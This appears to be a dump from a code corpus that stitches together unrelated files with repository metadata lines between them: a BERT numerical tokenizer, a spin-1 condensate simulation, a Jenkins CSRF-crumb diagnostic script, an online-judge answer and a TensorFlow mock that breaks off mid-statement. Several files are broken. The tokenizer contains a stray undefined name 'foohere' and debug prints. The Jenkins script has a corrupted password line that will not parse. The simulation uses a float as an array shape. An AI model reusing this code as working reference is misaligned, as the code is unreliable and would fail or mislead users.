# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes."""
from __future__ import absolute_import, division, print_function, unicode_literals
import collections
import logging
import os
import sys
import unicodedata
from io import open
from transformers import PreTrainedTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {'vocab_file': 'vocab.txt'}
PRETRAINED_VOCAB_FILES_MAP = {
'vocab_file':
{
'bert-base-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt",
'bert-large-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-vocab.txt",
'bert-base-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased-vocab.txt",
'bert-large-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-vocab.txt",
'bert-base-multilingual-uncased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-uncased-vocab.txt",
'bert-base-multilingual-cased': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-multilingual-cased-vocab.txt",
'bert-base-chinese': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-chinese-vocab.txt",
'bert-base-german-cased': "https://int-deepset-models-bert.s3.eu-central-1.amazonaws.com/pytorch/bert-base-german-cased-vocab.txt",
'bert-large-uncased-whole-word-masking': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-whole-word-masking-vocab.txt",
'bert-large-cased-whole-word-masking': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-whole-word-masking-vocab.txt",
'bert-large-uncased-whole-word-masking-finetuned-squad': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-uncased-whole-word-masking-finetuned-squad-vocab.txt",
'bert-large-cased-whole-word-masking-finetuned-squad': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-large-cased-whole-word-masking-finetuned-squad-vocab.txt",
'bert-base-cased-finetuned-mrpc': "https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-cased-finetuned-mrpc-vocab.txt",
}
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
'bert-base-uncased': 512,
'bert-large-uncased': 512,
'bert-base-cased': 512,
'bert-large-cased': 512,
'bert-base-multilingual-uncased': 512,
'bert-base-multilingual-cased': 512,
'bert-base-chinese': 512,
'bert-base-german-cased': 512,
'bert-large-uncased-whole-word-masking': 512,
'bert-large-cased-whole-word-masking': 512,
'bert-large-uncased-whole-word-masking-finetuned-squad': 512,
'bert-large-cased-whole-word-masking-finetuned-squad': 512,
'bert-base-cased-finetuned-mrpc': 512,
}
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
with open(vocab_file, "r", encoding="utf-8") as reader:
tokens = reader.readlines()
for index, token in enumerate(tokens):
token = token.rstrip('\n')
vocab[token] = index
return vocab
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class BertNumericalTokenizer(PreTrainedTokenizer):
r"""
Constructs a BertTokenizer.
:class:`~pytorch_transformers.BertTokenizer` runs end-to-end tokenization: punctuation splitting + wordpiece
Args:
vocab_file: Path to a one-wordpiece-per-line vocabulary file
do_lower_case: Whether to lower case the input. Only has an effect when do_wordpiece_only=False
do_basic_tokenize: Whether to do basic tokenization before wordpiece.
max_len: An artificial maximum length to truncate tokenized sequences to; Effective maximum length is always the
minimum of this value (if specified) and the underlying BERT model's sequence length.
never_split: List of tokens which will never be split during tokenization. Only has an effect when
do_wordpiece_only=False
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(self, vocab_file, do_lower_case=True, do_basic_tokenize=True, never_split=None,
unk_token="[UNK]", sep_token="[SEP]", pad_token="[PAD]", cls_token="[CLS]",
mask_token="[MASK]", tokenize_chinese_chars=True, **kwargs):
"""Constructs a BertNumericalTokenizer.
Args:
**vocab_file**: Path to a one-wordpiece-per-line vocabulary file
**do_lower_case**: (`optional`) boolean (default True)
Whether to lower case the input
Only has an effect when do_basic_tokenize=True
**do_basic_tokenize**: (`optional`) boolean (default True)
Whether to do basic tokenization before wordpiece.
**never_split**: (`optional`) list of string
List of tokens which will never be split during tokenization.
Only has an effect when do_basic_tokenize=True
**tokenize_chinese_chars**: (`optional`) boolean (default True)
Whether to tokenize Chinese characters.
This should likely be deactivated for Japanese:
see: https://github.com/huggingface/pytorch-pretrained-BERT/issues/328
"""
super(BertNumericalTokenizer, self).__init__(unk_token=unk_token, sep_token=sep_token,
pad_token=pad_token, cls_token=cls_token,
mask_token=mask_token, **kwargs)
if not os.path.isfile(vocab_file):
raise ValueError(
"Can't find a vocabulary file at path '{}'. To load the vocabulary from a Google pretrained "
"model use `tokenizer = BertNumericalTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`".format(vocab_file))
self.vocab = load_vocab(vocab_file)
self.unk_num = '[UNK_NUM]'
self.default_value = 1.0
never_split = ['[UNK_NUM]']
self.ids_to_tokens = collections.OrderedDict(
[(ids, tok) for tok, ids in self.vocab.items()])
self.do_basic_tokenize = do_basic_tokenize
self.numerical_tokenizer = NumericalTokenizer(do_lower_case=do_lower_case,
never_split=never_split)
if do_basic_tokenize:
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case,
never_split=never_split,
tokenize_chinese_chars=tokenize_chinese_chars)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab, unk_token=self.unk_token, unk_num=self.unk_num)
@property
def vocab_size(self):
return len(self.vocab)
def _tokenize(self, text, get_values=False, get_sigfigs=None, get_numeric_masks=None):
split_tokens = []
numeric_values = []
numeric_masks = []
split_sigfigs = []
i = 0
for (token, sigfig) in self.numerical_tokenizer.tokenize(text, never_split=self.all_special_tokens):
for (sub_token, numeric_value, numeric_mask) in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
numeric_values.append(numeric_value)
numeric_masks.append(numeric_mask)
if numeric_value != self.default_value:
split_sigfigs.append(sigfig)
else:
split_sigfigs.append('-1')
if numeric_value != self.default_value and sub_token != self.unk_num:
print(sub_token, numeric_value)
foohere
if get_numeric_masks:
return numeric_masks
if get_values:
return numeric_values
assert len(split_tokens) == len(numeric_values) == len(split_sigfigs)
if get_sigfigs:
return split_sigfigs
return split_tokens
def _convert_token_to_id(self, token):
""" Converts a token (str/unicode) in an id using the vocab. """
return self.vocab.get(token, self.vocab.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (string/unicode) using the vocab."""
return self.ids_to_tokens.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
""" Converts a sequence of tokens (string) in a single string. """
out_string = ' '.join(tokens).replace(' ##', '').strip()
return out_string
def save_vocabulary(self, vocab_path):
"""Save the tokenizer vocabulary to a directory or file."""
index = 0
if os.path.isdir(vocab_path):
vocab_file = os.path.join(vocab_path, VOCAB_FILES_NAMES['vocab_file'])
with open(vocab_file, "w", encoding="utf-8") as writer:
for token, token_index in sorted(self.vocab.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning("Saving vocabulary to {}: vocabulary indices are not consecutive."
" Please check that the vocabulary is not corrupted!".format(vocab_file))
index = token_index
writer.write(token + u'\n')
index += 1
return (vocab_file,)
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, *inputs, **kwargs):
""" Instantiate a BertNumericalTokenizer from pre-trained vocabulary files.
"""
if pretrained_model_name_or_path in PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES:
if '-cased' in pretrained_model_name_or_path and kwargs.get('do_lower_case', True):
logger.warning("The pre-trained model you are loading is a cased model but you have not set "
"`do_lower_case` to False. We are setting `do_lower_case=False` for you but "
"you may want to check this behavior.")
kwargs['do_lower_case'] = False
elif '-cased' not in pretrained_model_name_or_path and not kwargs.get('do_lower_case', True):
logger.warning("The pre-trained model you are loading is an uncased model but you have set "
"`do_lower_case` to False. We are setting `do_lower_case=True` for you "
"but you may want to check this behavior.")
kwargs['do_lower_case'] = True
return super(BertNumericalTokenizer, cls)._from_pretrained(pretrained_model_name_or_path, *inputs, **kwargs)
class NumericalTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True, never_split=None):
""" Constructs a BasicTokenizer.
Args:
**do_lower_case**: Whether to lower case the input.
**never_split**: (`optional`) list of str
Kept for backward compatibility purposes.
Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`)
List of token not to split.
"""
if never_split is None:
never_split = []
self.do_lower_case = do_lower_case
self.never_split = never_split
def tokenize(self, text, never_split=None):
""" Basic Numerical Tokenization of a piece of text.
Args:
**never_split**: (`optional`) list of str
Kept for backward compatibility purposes.
Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`)
List of token not to split.
"""
# digits = '0123456789'
# punctuation = '$%'
# text = self._clean_text(text)
# orig_tokens = whitespace_tokenize(text)
split_tokens, split_sigfigs = normalize_numbers_in_sent(text)
output_tokens = whitespace_tokenize(" ".join(split_tokens))
output_sigfigs = whitespace_tokenize(" ".join(split_sigfigs))
return zip(output_tokens,split_sigfigs)
# return output_tokens,
# _numbers = '[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?'
# fraction_pattern = re.compile(_fraction)
# number_pattern = re.compile(_numbers)
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True, never_split=None, tokenize_chinese_chars=True):
""" Constructs a BasicTokenizer.
Args:
**do_lower_case**: Whether to lower case the input.
**never_split**: (`optional`) list of str
Kept for backward compatibility purposes.
Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`)
List of token not to split.
**tokenize_chinese_chars**: (`optional`) boolean (default True)
Whether to tokenize Chinese characters.
This should likely be deactivated for Japanese:
see: https://github.com/huggingface/pytorch-pretrained-BERT/issues/328
"""
if never_split is None:
never_split = []
self.do_lower_case = do_lower_case
self.never_split = never_split
self.tokenize_chinese_chars = tokenize_chinese_chars
def tokenize(self, text, never_split=None):
""" Basic Tokenization of a piece of text.
Split on "white spaces" only, for sub-word tokenization, see WordPieceTokenizer.
Args:
**never_split**: (`optional`) list of str
Kept for backward compatibility purposes.
Now implemented directly at the base class level (see :func:`PreTrainedTokenizer.tokenize`)
List of token not to split.
"""
never_split = self.never_split + (never_split if never_split is not None else [])
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
if self.tokenize_chinese_chars:
text = self._tokenize_chinese_chars(text)
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case and token not in never_split:
token = token.lower()
token = self._run_strip_accents(token)
split_tokens.extend(self._run_split_on_punc(token))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text, never_split=None):
"""Splits punctuation on a piece of text."""
if never_split is not None and text in never_split:
return [text]
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
#dont split on periods if number is before it
# if _is_punctuation(char) and not chars[i-1].isdigit() or _is_punctuation(char) and i == 0:
if _is_punctuation(char):
if i == 0:
do_split = True
elif i == len(chars)-1:
do_split = True
else:
if not chars[i-1].isdigit():
do_split = True
else:
do_split = False
else:
do_split = False
if do_split:
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenization."""
def __init__(self, vocab, unk_token, unk_num, max_input_chars_per_word=100):
self.vocab = vocab
self.unk_token = unk_token
self.unk_num = unk_num
self.default_value = 1.0
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
Args:
text: A single token or whitespace separated tokens. This should have
already been passed through `BasicTokenizer`.
Returns:
A list of wordpiece tokens.
"""
output_tokens = []
numeric_values = []
numeric_mask = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token)
numeric_values.append(self.default_value)
numeric_mask.append(0)
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
try:
if token not in ['infinity', 'inf', 'nan']:
numeric_value = float(token)
is_number = True
else:
is_number = False
except:
ValueError
is_number = False
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr
if substr in self.vocab and is_number == False:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_number:
#ACTUAL NUMBER HERE
output_tokens.append(self.unk_num)
numeric_values.append(numeric_value)
numeric_mask.append(1)
elif is_bad:
output_tokens.append(self.unk_token)
numeric_values.append(self.default_value)#-9e9
numeric_mask.append(0)
else:
numeric_values.extend([self.default_value]*len(sub_tokens))#-9e9
numeric_mask.extend([0]*len(sub_tokens))
output_tokens.extend(sub_tokens)
assert len(numeric_values) == len(output_tokens) == len(numeric_mask)
return zip(output_tokens, numeric_values, numeric_mask)
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
# if cat.startswith("P") and cp != 46:
if cat.startswith("P"):
return True
return False
################
#
Small = {
'zero': 0.0,
'one': 1.0,
'two': 2.0,
'three': 3.0,
'four': 4.0,
'five': 5.0,
'six': 6.0,
'seven': 7.0,
'eight': 8.0,
'nine': 9.0,
'ten': 10.0,
'eleven': 11.0,
'twelve': 12.0,
'thirteen': 13.0,
'fourteen': 14.0,
'fifteen': 15.0,
'sixteen': 16.0,
'seventeen': 17.0,
'eighteen': 18.0,
'nineteen': 19.0,
'twenty': 20.0,
'thirty': 30.0,
'forty': 40.0,
'fifty': 50.0,
'sixty': 60.0,
'seventy': 70.0,
'eighty': 80.0,
'ninety': 90.0
}
Magnitude = {
'thousand': 1000.0,
'million': 1000000.0,
'billion': 1000000000.0,
'trillion': 1000000000000.0,
'quadrillion': 1000000000000000.0,
'quintillion': 1000000000000000000.0,
'sextillion': 1000000000000000000000.0,
'septillion': 1000000000000000000000000.0,
'octillion': 1000000000000000000000000000.0,
'nonillion': 1000000000000000000000000000000.0,
}
class NumberException(Exception):
def __init__(self, msg):
Exception.__init__(self, msg)
def text2num(sent):
if type(sent) is str:
words = [word.lower() for word in sent.strip().split()]
elif type(sent) is list:
words = [word.lower() for word in sent]
# n = 0
# g = 0
mantissa = 0
# number = 0.0
for i, word in enumerate(words):
if i == 0:
mantissa = Small.get(word, None)
if mantissa is None:
try:
mantissa = float(word)
except ValueError:
raise NumberException("First must be a number of sorts")
elif i != 0:
magnitude = Magnitude.get(word, None)
if magnitude is not None:
mantissa = mantissa*magnitude
else: # non-number word
raise NumberException("Unknown number: "+word)
return mantissa
def generate_ngrams(sentence, n):
return zip(*[sentence[i:] for i in range(n)])
def check_int(s):
if s[0] in ('-', '+'):
return s[1:].isdigit()
return s.isdigit()
def preprocess(sent, remove_pos=False, never_split=None):
"""
Preprocess the sentence by:
. remove commas from numbers (2,000 -> 2000)
. remove endings from ordinal numbers (2nd -> 2)
. convert "a {hundred,thousand...}" to "one {hundred,thousand,...}" so it can be handled by text2num function
. convert "digit digitword" (24 hundred) -> 2400
and return the sentence's preprocessed list of words that should be passed into text2num.
"""
if remove_pos:
words = [word[:word.rfind('_')] for word in sent.strip().split()]
else:
words = [word for word in sent.strip().split()]
tokenizer = BasicTokenizer(do_lower_case=True, never_split=never_split)
words = tokenizer.tokenize(sent)
# sent = ' '.join(tokens)
words_lower = [word.lower() for word in words]
# remove commas from numbers "2,000" -> 2000 and remove endings from ordinal numbers
for i in range(len(words)):
new_word = words_lower[i].replace(',', '')
if new_word.endswith(('th', 'rd', 'st', 'nd')):
new_word = new_word[:-2]
try:
if new_word not in ['infinity', 'inf', 'nan']:
int_word = float(new_word)
# words[i] = str(int_word)
words[i] = new_word
except ValueError:
pass # only modify this word if it's an int after preprocessing
Magnitude_with_hundred = Magnitude.copy()
Magnitude_with_hundred['hundred'] = 100
# convert "a {hundred,thousand,million,...}" to "one {hundred,thousand,million,...}"
for i in range(len(words)-1):
if words_lower[i] == 'a' and words_lower[i+1] in Magnitude_with_hundred:
words[i] = 'one'
# convert "24 {Magnitude}" -> 24000000000000 (mix of digits and words)
new_words = []
sigs = []
i = 0
while i < len(words)-1:
if check_int(words_lower[i]) and words_lower[i+1] in Magnitude_with_hundred:
new_words.append(str(float(words_lower[i]) * Magnitude_with_hundred[words_lower[i+1]]))
sigs.append(f'{words_lower[i]} {words_lower[i+1]}')
i += 1
else:
new_words.append(words[i])
sigs.append('')
if i == len(words) - 2:
new_words.append(words[i+1])
sigs.append('')
i += 1
return new_words, sigs
#
#
def normalize_numbers_in_sent(sent, remove_pos=False, never_split=None):
"""
Given a sentence, perform preprocessing and normalize number words to digits.
:param sent: sentence (str)
:return: a list of normalized words from the sentence
"""
out_words = []
words, sigfigs = preprocess(sent, remove_pos, never_split)
out_sigfigs = []
i = 0
while i < len(words):
for j in range(len(words), i, -1):
try:
number = str(text2num(words[i:j]))
if sigfigs[i] == '':
out_sigfigs.append(' '.join(words[i:j]))
else:
out_sigfigs.append(sigfigs[i])
out_words.append(number)
i = j-1 # skip this sequence since we replaced it with a number
break
except NumberException:
if j == i+1:
out_sigfigs.append('-1')
out_words.append(words[i])
i += 1
assert len(out_sigfigs) == len(out_words)
return out_words, out_sigfigs | 1.867188 | 2 |
dipole/splitting_dipole.py | wheelerMT/spin-1_BEC | 0 | 5538 | <gh_stars>0
import numpy as np
import multiprocessing as mp
import pyfftw
from numpy import pi, exp, sqrt, sin, cos, conj, arctan, tanh, tan
from numpy import heaviside as heav
from include import helper
import h5py
# ---------Spatial and potential parameters--------------
Mx = My = 64
Nx = Ny = 128 # Number of grid pts
dx = dy = 1 / 2 # Grid spacing
dkx = pi / (Mx * dx)
dky = pi / (My * dy) # K-space spacing
len_x = Nx * dx # Box length
len_y = Ny * dy
x = np.arange(-Mx, Mx) * dx
y = np.arange(-My, My) * dy
X, Y = np.meshgrid(x, y) # Spatial meshgrid
data = h5py.File('../data/splitting_dipole_data.hdf5', 'a')
data.create_dataset('grid/x', x.shape, data=x)
data.create_dataset('grid/y', y.shape, data=y)
kx = np.fft.fftshift(np.arange(-Mx, Mx) * dkx)
ky = np.fft.fftshift(np.arange(-My, My) * dky)
Kx, Ky = np.meshgrid(kx, ky) # K-space meshgrid
# Initialising FFTs
cpu_count = mp.cpu_count()
wfn_data = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
fft_forward = pyfftw.FFTW(wfn_data, wfn_data, axes=(0, 1), threads=cpu_count)
fft_backward = pyfftw.FFTW(wfn_data, wfn_data, direction='FFTW_BACKWARD', axes=(0, 1), threads=cpu_count)
# Framework for wavefunction data
psi_plus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
psi_0_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
psi_minus_k = pyfftw.empty_aligned((Nx, Ny), dtype='complex128')
# Controlled variables
V = 0. # Doubly periodic box
p = q = 0.
c0 = 2
c1 = 0.5 # Effective 3-component BEC
k = 0 # Array index
# ------------------------------ Generating SQV's -------------------------
# Euler angles
alpha = 0.
beta = pi / 4
gamma = 0.
N_vort = 2 # Number of vortices
pos = [-10, 0, 10, 0]
theta_k = np.empty((N_vort, Nx, Ny))
theta_tot = np.empty((Nx, Ny))
for k in range(N_vort // 2):
# Scaling positional arguments
Y_minus = 2 * pi * (Y - pos[k]) / len_y
X_minus = 2 * pi * (X - pos[N_vort // 2 + k]) / len_x
Y_plus = 2 * pi * (Y - pos[N_vort + k]) / len_y
X_plus = 2 * pi * (X - pos[3 * N_vort // 2 + k]) / len_x
x_plus = 2 * pi * pos[3 * N_vort // 2 + k] / len_x
x_minus = 2 * pi * pos[N_vort // 2 + k] / len_x
for nn in np.arange(-5, 5):
theta_k[k, :, :] += arctan(
tanh((Y_minus + 2 * pi * nn) / 2) * tan((X_minus - pi) / 2)) \
- arctan(tanh((Y_plus + 2 * pi * nn) / 2) * tan((X_plus - pi) / 2)) \
+ pi * (heav(X_plus, 1.) - heav(X_minus, 1.))
theta_k[k, :, :] -= (2 * pi * Y / len_y) * (x_plus - x_minus) / (2 * pi)
theta_tot += theta_k[k, :, :]
# Initial wavefunction
Psi = np.empty((3, Nx, Ny), dtype='complex128')
Psi[0, :, :] = np.zeros((Nx, Ny)) + 0j
Psi[1, :, :] = np.ones((Nx, Ny), dtype='complex128') * exp(1j * theta_tot)
Psi[2, :, :] = np.zeros((Nx, Ny)) + 0j
psi_plus, psi_0, psi_minus = helper.rotation(Psi, Nx, Ny, alpha, beta, gamma) # Performs rotation to wavefunction
# Aligning wavefunction to potentially speed up FFTs
pyfftw.byte_align(psi_plus)
pyfftw.byte_align(psi_0)
pyfftw.byte_align(psi_minus)
# ------------------------------------------------------------------------
# Normalisation constants
N_plus = dx * dy * np.linalg.norm(psi_plus) ** 2
N_0 = dx * dy * np.linalg.norm(psi_0) ** 2
N_minus = dx * dy * np.linalg.norm(psi_minus) ** 2
# Time steps, number and wavefunction save variables
Nt = 80000
Nframe = 200
dt = 5e-3
t = 0.
# Saving time variables:
data.create_dataset('time/Nt', data=Nt)
data.create_dataset('time/dt', data=dt)
data.create_dataset('time/Nframe', data=Nframe)
# Setting up variables to be sequentially saved:
psi_plus_save = data.create_dataset('wavefunction/psi_plus', (Nx, Ny, Nt/Nframe), dtype='complex128')
psi_0_save = data.create_dataset('wavefunction/psi_0', (Nx, Ny, Nt/Nframe), dtype='complex128')
psi_minus_save = data.create_dataset('wavefunction/psi_minus', (Nx, Ny, Nt/Nframe), dtype='complex128')
for i in range(Nt):
# Spin vector terms:
F_perp = sqrt(2.) * (conj(psi_plus) * psi_0 + conj(psi_0) * psi_minus)
Fz = abs(psi_plus) ** 2 - abs(psi_minus) ** 2
F = sqrt(abs(Fz) ** 2 + abs(F_perp) ** 2) # Magnitude of spin vector
# Total density
n = abs(psi_minus) ** 2 + abs(psi_0) ** 2 + abs(psi_plus) ** 2
# Sin and cosine terms for solution
C = cos(c1 * F * (-1j * dt))
if F.min() == 0:
S = np.zeros((Nx, Ny), dtype='complex128') # Ensures no division by zero
else:
S = 1j * sin(c1 * F * (-1j * dt)) / F
# Forward FFTs
fft_forward(psi_plus, psi_plus_k)
fft_forward(psi_0, psi_0_k)
fft_forward(psi_minus, psi_minus_k)
# Computing kinetic energy + quadratic Zeeman
psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny)
psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
# Inverse FFTs
fft_backward(psi_plus_k, psi_plus)
fft_backward(psi_0_k, psi_0)
fft_backward(psi_minus_k, psi_minus)
# Rescaling
psi_plus *= (Nx * Ny)
psi_0 *= (Nx * Ny)
psi_minus *= (Nx * Ny)
# Trap, linear Zeeman & interaction flow
psi_plus = ((C - S * Fz) * psi_plus - 1. / sqrt(2.) * S * conj(F_perp) * psi_0) * exp(-dt * (V - p + c0 * n))
psi_0 = (-1. / sqrt(2.) * S * F_perp * psi_plus + C * psi_0 - 1. / sqrt(2.) * S * conj(F_perp) * psi_minus) \
* exp(-dt * (V + c0 * n))
psi_minus = (-1. / sqrt(2.) * S * F_perp * psi_0 + (C + S * Fz) * psi_minus) * exp(-dt * (V + p + c0 * n))
# Forward FFTs
fft_forward(psi_plus, psi_plus_k)
fft_forward(psi_0, psi_0_k)
fft_forward(psi_minus, psi_minus_k)
# Computing kinetic energy + quadratic Zeeman
psi_plus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
psi_0_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2)) / (Nx * Ny)
psi_minus_k *= exp(-0.25 * dt * (Kx ** 2 + Ky ** 2 + 2 * q)) / (Nx * Ny)
# Inverse FFTs
fft_backward(psi_plus_k, psi_plus)
fft_backward(psi_0_k, psi_0)
fft_backward(psi_minus_k, psi_minus)
# Rescaling
psi_plus *= (Nx * Ny)
psi_0 *= (Nx * Ny)
psi_minus *= (Nx * Ny)
# Renormalizing wavefunction
psi_plus *= sqrt(N_plus) / sqrt(dx * dy * np.linalg.norm(psi_plus) ** 2)
psi_0 *= sqrt(N_0) / sqrt(dx * dy * np.linalg.norm(psi_0) ** 2)
psi_minus *= sqrt(N_minus) / sqrt(dx * dy * np.linalg.norm(psi_minus) ** 2)
# Prints current time and saves data to an array
if np.mod(i, Nframe) == 0:
print('it = %1.4f' % t)
psi_plus_save[:, :, k] = psi_plus[:, :]
psi_0_save[:, :, k] = psi_0[:, :]
psi_minus_save[:, :, k] = psi_minus[:, :]
k += 1
t += dt
data.close()
| 1.890625 | 2 |
src/main/resources/scripts/crumbDiag.py | cam-laf/vectorcast-execution-plugin | 4 | 5539 | from __future__ import print_function
import requests
import sys
import os
verbose=True
try:
username=os.environ['USERNAME']
password=<PASSWORD>['PASSWORD']
except:
print("Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables")
sys.exit(-1)
jenkins_url=os.environ['JENKINS_URL']
url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)'
print(url)
if username:
crumb = requests.get(url, auth=(username, password))
if crumb.status_code == 200:
crumb_headers = dict()
crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1]
if verbose:
print("Got crumb: %s" % crumb.text)
else:
print("Failed to get crumb")
print("\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:")
print("Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm")
print(jenkins_url + "/configureSecurity")
sys.exit(-1)
| 2.515625 | 3 |
URI/1-Beginner/1099.py | vicenteneto/online-judge-solutions | 0 | 5540 | # -*- coding: utf-8 -*-
for i in range(int(raw_input())):
x, y = [int(x) for x in raw_input().split()]
if x > y:
x, y = y, x
x += 1 if x % 2 == 0 else 2
print sum([j for j in range(x, y, 2)])
| 3.453125 | 3 |
mock_file.py | MahirGulzar/fpointnet-tiny | 0 | 5541 | import tensorflow as tf
FLIPPING_TENSOR = tf.constant([1.0, -1.0, 1.0])
@tf.function
def sample_data(points, labels, num_point):
if tf.random.uniform(shape=()) >= 0.5:
return points * FLIPPING_TENSOR, labels
return points, labels
mock_data = tf.constant([
[1., 2., 3.],
[4., 5., 6.],
[7., 8., 9.]
])
mock_labels = tf.constant([
[1.], [0.], [1.]
])
sampling_lambda = lambda x, y: sample_data(x, y, 512)
train_data = tf.data.Dataset.from_tensors((mock_data, mock_labels)) \
.map(sampling_lambda) \
.unbatch() \
